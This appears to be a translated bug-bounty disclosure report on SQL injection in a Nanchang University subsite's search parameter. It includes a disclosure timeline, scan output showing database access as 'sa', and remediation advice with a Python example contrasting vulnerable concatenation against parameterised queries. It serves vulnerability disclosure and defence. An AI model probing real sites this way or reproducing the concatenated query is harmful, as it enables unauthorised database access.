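2015-08-19: Details reported to the vendor; awaiting vendor handling
2015-08-24: Vendor confirmed; details disclosed to the vendor only
2015-09-03: Details disclosed to core white hats and experts in the relevant field
2015-09-13: Details disclosed to regular white hats
2015-09-23: Details disclosed to intern white hats
2015-10-08: Details disclosed to the public
SQL injection vulnerability in a Nanchang University subsite, SA privileges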
http://**.**.**.**/Users/Main/Search.aspx?campusCategoryId=1
A single quote triggers an error, so scan it
---
[15:39:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[15:39:49] [INFO] fetching current user
[15:39:49] [INFO] resumed: sa
current user: 'sa'
Scan again
---
[15:40:23] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[15:40:23] [INFO] fetching current database
[15:40:23] [INFO] resumed: AlumniDB
current database: 'AlumniDB'
……………………
1. Filtering
2. Least privilege
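The first remediation item, applied to the campusCategoryId parameter, as an added example that is not code from the report or the affected site. SQLite stands in for SQL Server so it runs offline; the table, column and function names are hypothetical, and the sample rows are constructed.

```python
import sqlite3

def make_db():
    # Constructed sample data; schema names are hypothetical.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE alumni (name TEXT, campus_category_id INTEGER)")
    conn.executemany("INSERT INTO alumni VALUES (?, ?)",
                     [("Alice", 1), ("Bob", 1), ("Carol", 2)])
    return conn

def search_vulnerable(conn, raw):
    # 'Before': the raw query-string value is concatenated into the SQL text,
    # so a stray single quote breaks the statement's syntax.
    sql = "SELECT name FROM alumni WHERE campus_category_id = " + raw
    return sorted(r[0] for r in conn.execute(sql))

def parse_category_id(raw):
    # Filtering: accept only a short run of ASCII digits, reject everything else.
    if not (raw.isascii() and raw.isdigit() and len(raw) <= 9):
        raise ValueError("campusCategoryId must be a non-negative integer")
    return int(raw)

def search_hardened(conn, raw):
    # 'After': the validated integer is bound as a parameter and never
    # becomes part of the SQL text.
    cid = parse_category_id(raw)
    rows = conn.execute(
        "SELECT name FROM alumni WHERE campus_category_id = ?", (cid,))
    return sorted(r[0] for r in rows)

def probe(fn, conn, raw):
    # Classify the outcome the way a tester watching responses would.
    try:
        return ("ok", fn(conn, raw))
    except sqlite3.Error as exc:
        return ("sql-error", str(exc))    # database error reaches the caller
    except ValueError as exc:
        return ("rejected", str(exc))     # stopped before reaching the database

if __name__ == "__main__":
    db = make_db()
    for value in ("1", "1'"):
        print(repr(value), "vulnerable:", probe(search_vulnerable, db, value))
        print(repr(value), "hardened:  ", probe(search_hardened, db, value))
```

The second item, least privilege, is a database-account setting (the application connecting as something other than sa) and is not modelled by this block.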
Severity: Medium
Vulnerability Rank: 6
Confirmed: 2015-08-24 08:31
Notifying the user to handle it
None yet